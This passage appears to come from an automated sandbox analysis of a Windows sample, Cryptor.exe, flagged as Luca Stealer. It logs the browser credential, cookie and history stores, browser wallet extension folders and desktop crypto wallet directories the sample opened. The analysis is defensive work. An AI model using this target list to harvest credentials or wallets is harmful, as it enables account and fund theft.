Source: Cryptor.exe, 00000000.00000003.1712946947.0000020DA5C55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\exodus\exodus.wallet\
Source: Cryptor.exe, 00000000.00000003.1712946947.0000020DA5C55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: Cryptor.exe, 00000000.00000003.1712946947.0000020DA5C55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\exodus\exodus.wallet\
Source: Cryptor.exe, 00000000.00000003.1712946947.0000020DA5C55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: Cryptor.exe, 00000000.00000003.1712946947.0000020DA5C55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\Coinomi\Coinomi\wallets\
Source: Cryptor.exe, 00000000.00000003.1712946947.0000020DA5C55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\exodus\exodus.wallet\
Source: Cryptor.exe, 00000000.00000003.1712946947.0000020DA5C55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Ethereum\keystore\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoe	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegll	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafch	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklb	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmnded	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajg	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhl	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\	Jump to behavior

Remote Access Functionality

Yara detected Luca Stealer

Source: Yara match	File source: 0.2.Cryptor.exe.7ff620fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
